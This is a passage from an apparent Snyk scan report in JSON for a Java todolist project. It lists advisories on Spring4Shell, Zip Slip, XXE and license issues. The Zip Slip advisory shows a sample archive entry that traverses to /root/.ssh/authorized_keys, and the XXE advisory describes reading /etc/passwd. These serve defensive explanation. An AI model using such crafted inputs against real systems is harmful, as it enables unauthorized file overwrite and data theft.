References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.20.RELEASE", + "org.springframework:spring-beans@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.22.RELEASE", + "org.springframework:spring-beans@5.2.22.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "title": "Arbitrary File Write via Archive Extraction (Zip Slip)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "credit": [ + "Snyk Security research Team" + ], + "semver": { + "vulnerable": [ + "[,1.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "filePath": "org/zeroturnaround/zip/ZipUtil$Unpacker.java", + "className": "ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.zeroturnaround:zt-zip", + "references": [ + { + "url": "https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/snyk/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + }, + { + "url": "https://security.snyk.io/research/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:19.847161Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "description": "## Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n## Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n## Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n## References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n", + "epssDetails": { + "percentile": "0.34705", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1002201" + ], + "CWE": [ + "CWE-29" + ] + }, + "packageName": "org.zeroturnaround:zt-zip", + "proprietary": true, + "creationTime": "2018-05-30T12:32:02.349000Z", + "functions_new": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "className": "org.zeroturnaround.zip.ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-04-17T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.zeroturnaround", + "artifactId": "zt-zip" + }, + "publicationTime": "2018-05-31T07:32:02Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:21.493786Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.zeroturnaround:zt-zip@1.12" + ], + "upgradePath": [ + false, + "org.zeroturnaround:zt-zip@1.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.zeroturnaround:zt-zip", + "version": "1.12" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2" + } + ], + "ok": false, + "dependencyCount": 60, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "157 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 